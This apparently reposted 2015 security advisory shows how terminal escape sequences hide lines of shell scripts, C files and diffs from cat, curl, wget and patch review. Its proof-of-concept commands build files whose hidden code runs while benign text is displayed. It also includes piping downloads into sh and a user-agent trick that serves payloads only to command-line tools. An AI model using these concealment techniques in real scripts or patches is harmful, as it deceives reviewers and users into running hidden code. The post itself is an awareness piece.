s/party/hack like it's 1999

Published
Credit
Risk
2015.09.19
up201407890
Low
CWE
CVE
Local
Remote
N/A
N/A
Yes
No

Federico Bento <up201407890 () alunos dcc fc up pt>

So recently i've encountered a post by Kurt Seifried of RedHat on oss-sec's mailing list entitled "Terminal escape sequences - the new XSS for admins?"

http://www.openwall.com/lists/oss-security/2015/08/11/8

This is a little misleading title, since escape sequences have been introduced circa 70's, so it's actually not that new.


How it technically works:

A terminal escape sequence is a special sequence of characters that is printed (like any other text). If the terminal understands the sequence, it won't display the character-sequence, but will perform some action.


While some people might already know what i'm going to present you, the majority I believe doesn't, so this is mostly to raise awareness.



$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho doing something very nice!\n' > backdoor.sh

$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!


As you can see, our beloved 'cat' cheated on us. Why?

Because instead of displaying the character-sequence, the escape sequence \033[XA (being X the number of times) performed some action. And this action moves the cursor up X times, overwriting what is above it X lines. But this doesn't affect only 'cat', it affects everything that interprets escape sequences.



$ head backdoor.sh
#!/bin/bash
echo doing something very nice!

$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!

$ more backdoor.sh
#!/bin/bash
echo doing something very nice!


It's not over yet!


$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!


But if we pipe it into a shell...


$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!

$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!


You might be thinking "If I opened that in my browser, I would detect it being malicious!"

Well, think again...

One can have all sorts of fun with user-agents, something that can easily come to mind is verifying if the user-agent is from curl or wget,

and make them download the malicious file, if not,

redirect them to a legitimate file that looks like the original output. Your browser would fool you then.


I wouldn't even be surprised if most of those install scripts that make use of these 'pipe into sh' bullcrap abused this. I wouldn't even be surprised if most of you were already pwned by escape sequences in any situation at all. Imagine the possibilities, from hidden ssh keys on your authorized_keys to options hidden on your configuration files... It's no secret, most of us rely on 'cat' to view files. I guess this is one black kitty, giving you bad luck.



Here's another example with a .c file


$ printf '#include <stdio.h>\n\nint main()\n{\ntprintf("doing something evil\n");\nt/*\033[2A\nt/* This simple program doesnt do much... */\ntprintf("doing something very nice\n");\ntreturn 0;\n}\n' > nice.c

$ cat nice.c
#include <stdio.h>

int main()
{
/* This simple program doesnt do much... */
printf("doing something very nice\n");
return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice


'diff' also interprets escape sequences and so do the resulting patches

going back to the first example, imagine I have a backdoored.sh that is backdoored, and a legit.sh that does what it's output tells us.


$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh 2015-09-17 16:25:42.985349535 +0100
+++ legit.sh 2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
#!/bin/bash
-echo doing something very nice!
+echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!


Hint:
'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.


s/party/hack like it's 1999

References:

http://seclists.org/oss-sec/2015/q3/565


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com